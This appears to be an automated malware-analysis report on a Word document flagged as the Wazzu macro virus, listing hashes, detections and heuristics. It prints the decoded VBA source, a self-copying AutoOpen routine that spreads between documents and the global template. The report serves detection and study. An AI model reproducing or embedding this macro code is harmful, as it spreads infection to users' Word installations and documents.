Wazzu — Office (OLE) malware analysis

Static analysis result for SHA-256 b01cc4f184d4df31…

MALICIOUS

Office (OLE)

Size: 33.5 KB
Created: 1999-09-08 11:25:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 8084f03e719ddbced458bd524291c30d
SHA-1: 0696ef7ac8b999d754889a8b5df06008785b157f
SHA-256: b01cc4f184d4df3121e86d7fef7187d6804dd21472b30d1b91ad8d4ce90b675a
Risk Score: 188

Malware Insights

Wazzu · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The presence of legacy WordBasic macro virus markers and a VBA AutoOpen macro strongly suggests malicious intent. The AutoOpen subroutine is designed to copy itself to the global template, potentially enabling persistence or further execution. ClamAV detections further confirm the malicious nature of the file, identifying it as a variant of Wazzu.

Heuristics (4)

  • ClamAV: Doc.Trojan.Wazzu-47 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Wazzu-47
  • Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script: Attribute VB_Name = "autoOpen"

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1442 bytes

SHA-256: 47514bda5e3c3ec9ac2bea61b0824b09a61ec2aea5671ea13de987589bd025b2
Detection: ClamAV: Doc.Trojan.Wazzu-11
Obfuscation or payload: unlikely

First 1,000 lines of the extracted script:

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "autoOpen"

Public Sub MAIN()
Dim fileMacro$
Dim globMacro$
Dim MacroFile$
    On Error GoTo -1: On Error GoTo errCaught
        
    WordBasic.FileSummaryInfo Update:=1
    Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSummaryInfo(False)
    WordBasic.CurValues.FileSummaryInfo dlg

    fileMacro$ = dlg.Directory + "\" + dlg.FileName + ":autoOpen"
    globMacro$ = "Global:autoOpen"
    MacroFile$ = UCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10))

    If MacroFile$ = "NORMAL.DOT" Then
        WordBasic.MacroCopy globMacro$, fileMacro$
        WordBasic.FileSaveAs Format:=1
    Else
        WordBasic.MacroCopy fileMacro$, globMacro$
    
GoTo bye
errCaught:

bye:
    On Error GoTo -1: On Error GoTo 0

    End If
End Sub

Private Sub RndWord()
Dim wordNum
    WordBasic.FileSummaryInfo Update:=1
    Dim dlg As Object: Set dlg = WordBasic.DialogRecord.DocumentStatistics(False)
    WordBasic.CurValues.DocumentStatistics dlg

    wordNum = WordBasic.Int(Rnd() * WordBasic.Val(dlg.Words))
    WordBasic.StartOfDocument
    WordBasic.WordRight wordNum
End Sub